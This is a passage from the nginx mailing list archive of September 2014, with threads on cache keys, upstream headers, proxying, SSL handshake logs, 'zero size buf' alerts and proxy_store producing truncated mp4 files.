<20140917071707.GE3771@daoine.org> On Mon, Sep 15, 2014 at 02:57:34PM +0300, Roland RoLaNd wrote: Hi there, this is all untested by me... > i have a url looking as such: ?mysite.com/some/path/rest/v2/giveit.view&user=282&imageid=23&size=80 > > ?i want the cache key to match imageid=23&size=80 without the "user" part. You could try using "map" to define a variable which is 'the url without the part that matches "user=[0-9]+&"', and then use that in the cache key, perhaps? > $args isn't matching because incoming url lacks the "?" part, so $uri is detected as mysite.com/some/path/rest/v2/giveit.view&imageid=23&size=80 $url probably starts with the character "/". > Is there a way i could force nginx to detect that query string, or rewrite/set the args on each request ? There is no query string. You may find it easier to switch to "standard" http/cgi-like urls. But that's a separate thing. f -- Francis Daly francis at daoine.org From artemrts at ukr.net Wed Sep 17 07:20:49 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 10:20:49 +0300 Subject: Response header from fcgi server In-Reply-To: <20140917070633.GC3771@daoine.org> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> Message-ID: <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> --- Original message --- From: "Francis Daly" Date: 17 September 2014, 10:06:47 > On Wed, Sep 17, 2014 at 08:49:36AM +0300, wishmaster wrote: > > Hi there, > > > PHP-application sends response with HTTP header X-Language and I need pass this to nginx. > > With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. > > > > What I am doing wrong? > > $http_x_language is a request header field -- what the client sent > to nginx. > > $sent_http_x_language is a response header field -- what nginx sent to > the client. > > $upstream_http_x_language would be what an upstream sent to nginx. > > What do you do? What do you see? What do you expect to see? > Oh Francis, you help save me a lot of time as always, thanks. I did not know about $upstream_* variable Without fastcgi caching, $sent_http_x_language is not empty, but if chaching is "ON", $sent_http_x_language variable is empty. But $upstream_* contain expected data. Thanks a lot! -- Cheers, Vitaliy From francis at daoine.org Wed Sep 17 07:23:04 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:23:04 +0100 Subject: nginx as a forward proxy (kind of) In-Reply-To: <65918e4ea8fbcb834d4a93c1be8345bb@ruby-forum.com> References: <65918e4ea8fbcb834d4a93c1be8345bb@ruby-forum.com> Message-ID: <20140917072304.GF3771@daoine.org> On Sun, Sep 14, 2014 at 12:28:30AM +0200, Sam J. wrote: Hi there, > I am very new to nginx and have a quick question. > I am using nginx to basically redirect certain websites through another > proxy. I am using DNS to resolve *.domain.com to the IP address of > nginx server. > I am able to get it to work with www.domain.com (see sample config > below) but would like it to redirect any subdomain (wildcard) to > corresponding subdomain. Any way to do this without having a similar > config for each subdomain? http://nginx.org/r/proxy_pass See the part mentioning variables. Note that nginx is a reverse proxy, which pretty much means that you control the upstream(s). It can act sort-of like a normal proxy in your controlled environment; but if you want a proxy, get a proxy and you'll be happier. And because you use ssl, to keep the browser happy you will want to make sure that your certificate fits whatever hostname the browser requests. (Or configure the browser not to care about man-in-the-middle attacks.) f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 17 07:27:29 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:27:29 +0100 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: References: Message-ID: <20140917072729.GG3771@daoine.org> On Fri, Sep 12, 2014 at 04:37:24AM -0400, antoniofernandez wrote: Hi there, > I have two index.php files : > > /public/index.php > /index.php > > > The content of /index.php file is : > > ----------------------------- content ------------------------- > ./public/index.php > ------------------------------------------------------------------ nginx doesn't "do" php. It is probably worth checking the logs of your fastcgi server to see what is going on. Or maybe your browser is trying to be clever -- what http response do you get for the initial request? Do you see one or two requests made by the browser when you test (you can check the nginx logs to see that). f -- Francis Daly francis at daoine.org From me at myconan.net Wed Sep 17 07:47:07 2014 From: me at myconan.net (Edho Arief) Date: Wed, 17 Sep 2014 16:47:07 +0900 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: <20140917072729.GG3771@daoine.org> References: <20140917072729.GG3771@daoine.org> Message-ID: > On Fri, Sep 12, 2014 at 04:37:24AM -0400, antoniofernandez wrote: > > Hi there, > >> I have two index.php files : >> >> /public/index.php >> /index.php >> >> >> The content of /index.php file is : >> >> ----------------------------- content ------------------------- >> ./public/index.php >> ------------------------------------------------------------------ > if it's a git repository checkout, probably caused by your windows' git build treating symlink files as plaintext file with content of target path. From nginx-forum at nginx.us Wed Sep 17 07:51:12 2014 From: nginx-forum at nginx.us (antoniofernandez) Date: Wed, 17 Sep 2014 03:51:12 -0400 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: <20140917072729.GG3771@daoine.org> References: <20140917072729.GG3771@daoine.org> Message-ID: <72af3c50b091b2ed1b2ee45d4af54843.NginxMailingListEnglish@forum.nginx.org> Hi Francis, thanks for the reply. The problem was just a misundertanding between the NTFS filesystem and EXT3 in Linux. The index.php file is a symbolink link, but Windows don?t recognize symbolik links, that?s explains the different behaviour. Regards, Antonio Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253207,253335#msg-253335 From nginx-forum at nginx.us Wed Sep 17 07:57:13 2014 From: nginx-forum at nginx.us (antoniofernandez) Date: Wed, 17 Sep 2014 03:57:13 -0400 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: References: Message-ID: <3cfaa895fb3c5d910689117f7fabfc5e.NginxMailingListEnglish@forum.nginx.org> Hi Edho, That?s it , exactly my problem. Thanks a lot, Regards, Antonio Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253207,253336#msg-253336 From shahzaib.cb at gmail.com Wed Sep 17 11:25:12 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 17 Sep 2014 16:25:12 +0500 Subject: zero size buf in output !! In-Reply-To: <20140827171624.GX1849@mdounin.ru> References: <20140827171624.GX1849@mdounin.ru> Message-ID: Hi Maxim, Upgraded nginx to 1.7.4 and looks like the issue is gone. Regards. Shahzaib On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > Hello! > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > We're facing following error on edge server with nginx-1.6.1, using > > proxy_store on edge. > > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 > r:0 > > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 > 0-0 > > while sending to client, client: 119.160.118.123, server: > > storage4.content.com, request: "GET > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", > host: " > > storage4.content.com" > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 > r:0 > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 > 0-0 > > while sending to client, client: 121.52.147.68, server: > storage9.content.com, > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 HTTP/1.1", > > upstream: " > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", > > host: "storage9.content.com", referrer: " > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > nginx version: nginx/1.6.1 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > --conf-path=/etc/nginx/nginx.conf > --error-log-path=/var/log/nginx/error.log > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > --lock-path=/var/run/nginx.lock > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > --group=nginx --with-http_flv_module --with-http_mp4_module > > You may want to try 1.7.4 to see if it helps (there are some > potentially related changes in nginx 1.7.3). > > If it doesn't, providing debug log may be helpful. See > http://wiki.nginx.org/Debugging for more hints. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Wed Sep 17 12:29:39 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 17 Sep 2014 17:29:39 +0500 Subject: zero size buf in output !! In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Well, i again received the same error but its much improvement in time frame. If the error was occurring after each 5min, now the same error is occurring after 30~50min. The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", [root at tw data]# nginx -V nginx version: nginx/1.7.4 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module You have mail in /var/spool/mail/root Regards. Shahzaib On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib wrote: > Hi Maxim, > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > Regards. > Shahzaib > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > >> Hello! >> >> On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: >> >> > We're facing following error on edge server with nginx-1.6.1, using >> > proxy_store on edge. >> > >> > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 >> r:0 >> > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 >> 0-0 >> > while sending to client, client: 119.160.118.123, server: >> > storage4.content.com, request: "GET >> > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " >> > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", >> host: " >> > storage4.content.com" >> > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 >> r:0 >> > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 >> 0-0 >> > while sending to client, client: 121.52.147.68, server: >> storage9.content.com, >> > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 >> HTTP/1.1", >> > upstream: " >> > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", >> > host: "storage9.content.com", referrer: " >> > http://files.com/video/2618018/aashiqui-3-new-songs" >> > >> > nginx version: nginx/1.6.1 >> > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) >> > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx >> > --conf-path=/etc/nginx/nginx.conf >> --error-log-path=/var/log/nginx/error.log >> > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid >> > --lock-path=/var/run/nginx.lock >> > --http-client-body-temp-path=/var/cache/nginx/client_temp >> > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx >> > --group=nginx --with-http_flv_module --with-http_mp4_module >> >> You may want to try 1.7.4 to see if it helps (there are some >> potentially related changes in nginx 1.7.3). >> >> If it doesn't, providing debug log may be helpful. See >> http://wiki.nginx.org/Debugging for more hints. >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From artemrts at ukr.net Wed Sep 17 14:22:14 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 17:22:14 +0300 Subject: Response header from fcgi server In-Reply-To: <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> Message-ID: <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> --- Original message --- From: "wishmaster" Date: 17 September 2014, 10:21:03 > > > > --- Original message --- > From: "Francis Daly" > Date: 17 September 2014, 10:06:47 > > > > > On Wed, Sep 17, 2014 at 08:49:36AM +0300, wishmaster wrote: > > > > Hi there, > > > > > PHP-application sends response with HTTP header X-Language and I need pass this to nginx. > > > With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. > > > > > > What I am doing wrong? > > > > $http_x_language is a request header field -- what the client sent > > to nginx. > > > > $sent_http_x_language is a response header field -- what nginx sent to > > the client. > > > > $upstream_http_x_language would be what an upstream sent to nginx. > > > > What do you do? What do you see? What do you expect to see? > > > Oh Francis, you help save me a lot of time as always, thanks. > I did not know about $upstream_* variable > > Without fastcgi caching, $sent_http_x_language is not empty, but if chaching is "ON", $sent_http_x_language variable is empty. But $upstream_* contain expected data. > My problem is still actual. I am attempting to use http header from fastcgi server as part of cache key. $upstream_http_x_language contains value, but empty in cache key Part of cached page: KEY: httpGETexample.comfoto-video-audio/videoUAH ?Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Last-Modified: Wed, 17 Sep 2014 13:59:43 GMT Cache-Control: private X-Language: uk X-Accel-Buffering: yes key must be httpGETexample.comfoto-video-audio/videoukUAH -- w From francis at daoine.org Wed Sep 17 14:29:33 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 15:29:33 +0100 Subject: Response header from fcgi server In-Reply-To: <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> Message-ID: <20140917142933.GI3771@daoine.org> On Wed, Sep 17, 2014 at 05:22:14PM +0300, wishmaster wrote: Hi there, > My problem is still actual. > I am attempting to use http header from fastcgi server as part of cache key. > $upstream_http_x_language contains value, but empty in cache key How should that work? A request comes in to nginx. nginx creates the cache key to see if it should serve the request from cache, or should pass the request along to upstream and store the response in cache. If you try to put something into your cache key that nginx can only know about after the request has been passed upstream, you are going to have a problem. > Part of cached page: > > KEY: httpGETexample.comfoto-video-audio/videoUAH > key must be > httpGETexample.comfoto-video-audio/videoukUAH Why does this matter? What two requests would lead to upstream sending content with a different language? Use whatever is different in those requests in your cache key. f -- Francis Daly francis at daoine.org From artemrts at ukr.net Wed Sep 17 14:42:18 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 17:42:18 +0300 Subject: Response header from fcgi server In-Reply-To: <20140917142933.GI3771@daoine.org> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> <20140917142933.GI3771@daoine.org> Message-ID: <1410964781.6387807.dvckan69@frv34.fwdcdn.com> --- Original message --- From: "Francis Daly" Date: 17 September 2014, 17:29:43 > On Wed, Sep 17, 2014 at 05:22:14PM +0300, wishmaster wrote: > > Hi there, > > > My problem is still actual. > > I am attempting to use http header from fastcgi server as part of cache key. > > $upstream_http_x_language contains value, but empty in cache key > > How should that work? > > A request comes in to nginx. > > nginx creates the cache key to see if it should serve the request from > cache, or should pass the request along to upstream and store the response > in cache. > > If you try to put something into your cache key that nginx can only know > about after the request has been passed upstream, you are going to have > a problem. I know how this works. > > > Part of cached page: > > > > KEY: httpGETexample.comfoto-video-audio/videoUAH > > > key must be > > httpGETexample.comfoto-video-audio/videoukUAH > > Why does this matter? > > What two requests would lead to upstream sending content with a different > language? Use whatever is different in those requests in your cache key. At this time cache key uses $cookie_language, this works as expected. But I do not understand why with $http_ or $upstream_ does not work. From shmick at riseup.net Wed Sep 17 15:17:35 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Thu, 18 Sep 2014 01:17:35 +1000 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <54184F09.6090205@riseup.net> References: <54184F09.6090205@riseup.net> Message-ID: <5419A60F.9020707@riseup.net> it works with postfix i guess not in nginx feature request ? nginx: [emerg] "ssl_certificate" directive is duplicate in /etc/nginx.conf:53 nginx: configuration file /etc/nginx.conf test failed shmick at riseup.net wrote: > is it possible with SNI and nginx to have both an ECDSA and RSA cert > serving 1 website on 1 IP ? > > best practices ? > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From francis at daoine.org Wed Sep 17 22:08:30 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 23:08:30 +0100 Subject: Response header from fcgi server In-Reply-To: <1410964781.6387807.dvckan69@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> <20140917142933.GI3771@daoine.org> <1410964781.6387807.dvckan69@frv34.fwdcdn.com> Message-ID: <20140917220830.GJ3771@daoine.org> On Wed, Sep 17, 2014 at 05:42:18PM +0300, wishmaster wrote: > > What two requests would lead to upstream sending content with a different > > language? Use whatever is different in those requests in your cache key. > > At this time cache key uses $cookie_language, this works as expected. But I do not understand why with $http_ or $upstream_ does not work. > $http_ comes from the client, so should work. $upstream_ is empty until after upstream has responded, which is too late to be used in a cache key. f -- Francis Daly francis at daoine.org From thunderhill4 at gmail.com Thu Sep 18 05:32:18 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Thu, 18 Sep 2014 11:02:18 +0530 Subject: ssl hand shake with upstream url Message-ID: Hi, I am getting ssl hand shake error. upstream server is running on 443 port. Enabled the debug in nginx. And the configuration is as follows. upstream backends { server xyz.elb.amazonaws.com:443; } server { listen 80; server_name xyz-.elb.amazonaws.com; location / { proxy_set_header Host $host; proxy_set_header Accept-Encoding ""; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-Server $host; proxy_ssl_session_reuse off; proxy_pass https://backends; } 2014/09/18 05:14:57 [debug] 2460#0: posix_memalign: 0000000000DCE430:256 @16 2014/09/18 05:14:57 [debug] 2460#0: *6 accept: xx.xx.xx.xx fd:16 2014/09/18 05:14:57 [debug] 2460#0: *6 event timer add: 16: 60000:1411017357143 2014/09/18 05:14:57 [debug] 2460#0: *6 reusable connection: 1 2014/09/18 05:14:57 [debug] 2460#0: *6 epoll add event: fd:16 op:1 ev:80000001 2014/09/18 05:14:57 [debug] 2460#0: post event 0000000000DF5110 2014/09/18 05:14:57 [debug] 2460#0: delete posted event 0000000000DF5110 2014/09/18 05:14:57 [debug] 2460#0: accept on 0.0.0.0:80, ready: 0 2014/09/18 05:14:57 [debug] 2460#0: posix_memalign: 0000000000DCE540:256 @16 2014/09/18 05:14:57 [debug] 2460#0: *7 accept: xx.xx.xx.xx fd:17 2014/09/18 05:14:57 [debug] 2460#0: *7 event timer add: 17: 60000:1411017357146 2014/09/18 05:14:57 [debug] 2460#0: *7 reusable connection: 1 2014/09/18 05:14:57 [debug] 2460#0: *7 epoll add event: fd:17 op:1 ev:80000001 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: -1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_get_error: 2 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 0 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: -1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_get_error: 2 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: 1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL: TLSv1.2, cipher: "ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) Mac=AEAD" 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream send request 2014/09/18 05:14:57 [debug] 2460#0: *1 chain writer buf fl:1 s:390 2014/09/18 05:14:57 [debug] 2460#0: *1 chain writer in: 0000000000DD7470 2014/09/18 05:14:57 [debug] 2460#0: *1 malloc: 0000000000E2F450:80 2014/09/18 05:14:57 [debug] 2460#0: *1 malloc: 0000000000E1C130:16384 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL buf copy: 390 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL to write: 390 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_write: 390 2014/09/18 05:14:57 [debug] 2460#0: *1 chain writer out: 0000000000000000 2014/09/18 05:14:57 [debug] 2460#0: *1 event timer del: 9: 1411017357134 2014/09/18 05:14:57 [debug] 2460#0: *1 event timer add: 9: 60000:1411017357151 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream process header 2014/09/18 05:14:57 [debug] 2460#0: *1 malloc: 0000000000DCE650:8192 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_read: -1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_get_error: 2 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream request: "/?" 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream process header What is going wrong? -- T -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Thu Sep 18 07:40:03 2014 From: nginx-forum at nginx.us (bjorntj) Date: Thu, 18 Sep 2014 03:40:03 -0400 Subject: New session id on each request... Message-ID: I have Nginx as a reverse proxy in front of a Tomcat server running a webapp. This works ok using Firefox but not Chrome or IE... When using Chrome or IE, the JSESSIONID gets a new value for each request (instead of keeeping the same value as it should). Are there some settings I am missing to fix this? (Using Apache it works for all browsers but I want to use Nginx.... :) ) Regards, BTJ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253367,253367#msg-253367 From mdounin at mdounin.ru Thu Sep 18 10:26:46 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 18 Sep 2014 14:26:46 +0400 Subject: ssl hand shake with upstream url In-Reply-To: References: Message-ID: <20140918102646.GM91749@mdounin.ru> Hello! On Thu, Sep 18, 2014 at 11:02:18AM +0530, thunder hill wrote: > Hi, > > I am getting ssl hand shake error. upstream server is running on 443 port. > Enabled the debug in nginx. > And the configuration is as follows. [...] > 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 1 > 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: 1 > 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL: TLSv1.2, cipher: > "ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) > Mac=AEAD" > 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream send request [...] > What is going wrong? There is nothing wrong in the debug log provided. SSL connection was successfully established using the TLS 1.2 protocol, ECDHE-RSA-AES128-GCM-SHA256 cipher suite. -- Maxim Dounin http://nginx.org/ From shahzaib.cb at gmail.com Thu Sep 18 10:49:25 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 15:49:25 +0500 Subject: Proxy_store downloading half videos !! Message-ID: Hi, We're using proxy_store on the edge server for replicating requested mp4 files and some of our users reported that some of the videos are half sized and therefore they are unable to stream whole video file on their end (coming from the edge server). On digging into the access_logs of nginx, i found the 500 internal server errors for 10~20 videos and on checking the size of 500 error videos it was half of the size compare to the mirrored video files on the origin. Please check the following error of the culprit video link :- 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" I'd like to inform that the issue is coming for 40% of the videos. error_log :- 2014/09/18 15:30:40 [error] 3883#0: *77490 "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" You can see the "start time exceeds error" on edge server but the video link starting from start=736.8 exists on origin server. Nginx config :- server { listen 80; server_name lw3.files.com; root /var/www/html/tunefiles; location ~ \.(mp4|jpeg|jpg)$ { root /var/www/html/tunefiles; mp4; error_page 404 = @fetch; } location ~ \.(php)$ { proxy_pass http://fl008.files.net:80; } location @fetch { internal; proxy_pass http://fl008.origin.com:80; proxy_store on; proxy_store_access user:rw group:rw all:r; root /var/www/html/tunefiles; } } Regards. Shahzaib -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Sep 18 10:55:33 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 15:55:33 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: Message-ID: nginx version: nginx/1.7.4 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module On Thu, Sep 18, 2014 at 3:49 PM, shahzaib shahzaib wrote: > Hi, > > We're using proxy_store on the edge server for replicating requested > mp4 files and some of our users reported that some of the videos are half > sized and therefore they are unable to stream whole video file on their end > (coming from the edge server). On digging into the access_logs of nginx, i > found the 500 internal server errors for 10~20 videos and on checking the > size of 500 error videos it was half of the size compare to the mirrored > video files on the origin. Please check the following error of the culprit > video link :- > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET > /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 > 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 > (compatible; MSIE 8.0; Windows NT 6.0)" > > I'd like to inform that the issue is coming for 40% of the videos. > > error_log :- > > 2014/09/18 15:30:40 [error] 3883#0: *77490 > "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start > time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, > request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 > HTTP/1.1" > > You can see the "start time exceeds error" on edge server but the video > link starting from start=736.8 exists on origin server. > > Nginx config :- > > server { > > listen 80; > server_name lw3.files.com; > root /var/www/html/tunefiles; > location ~ \.(mp4|jpeg|jpg)$ { > root /var/www/html/tunefiles; > mp4; > error_page 404 = @fetch; > > } > > > location ~ \.(php)$ { > proxy_pass http://fl008.files.net:80; > } > > > > location @fetch { > internal; > proxy_pass http://fl008.origin.com:80; > proxy_store on; > proxy_store_access user:rw group:rw all:r; > root /var/www/html/tunefiles; > } > > > > } > > Regards. > Shahzaib > -------------- next part -------------- An HTML attachment was scrubbed... URL: From arut at nginx.com Thu Sep 18 11:21:18 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 18 Sep 2014 15:21:18 +0400 Subject: Proxy_store downloading half videos !! In-Reply-To: References: Message-ID: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> On 18 Sep 2014, at 14:49, shahzaib shahzaib wrote: > Hi, > > We're using proxy_store on the edge server for replicating requested mp4 files and some of our users reported that some of the videos are half sized and therefore they are unable to stream whole video file on their end (coming from the edge server). On digging into the access_logs of nginx, i found the 500 internal server errors for 10~20 videos and on checking the size of 500 error videos it was half of the size compare to the mirrored video files on the origin. Please check the following error of the culprit video link :- > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" > > I'd like to inform that the issue is coming for 40% of the videos. > > error_log :- > > 2014/09/18 15:30:40 [error] 3883#0: *77490 "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" > > You can see the "start time exceeds error" on edge server but the video link starting from start=736.8 exists on origin server. > > Nginx config :- > > server { > > listen 80; > server_name lw3.files.com; > root /var/www/html/tunefiles; > location ~ \.(mp4|jpeg|jpg)$ { > root /var/www/html/tunefiles; > mp4; > error_page 404 = @fetch; > > } > > > location ~ \.(php)$ { 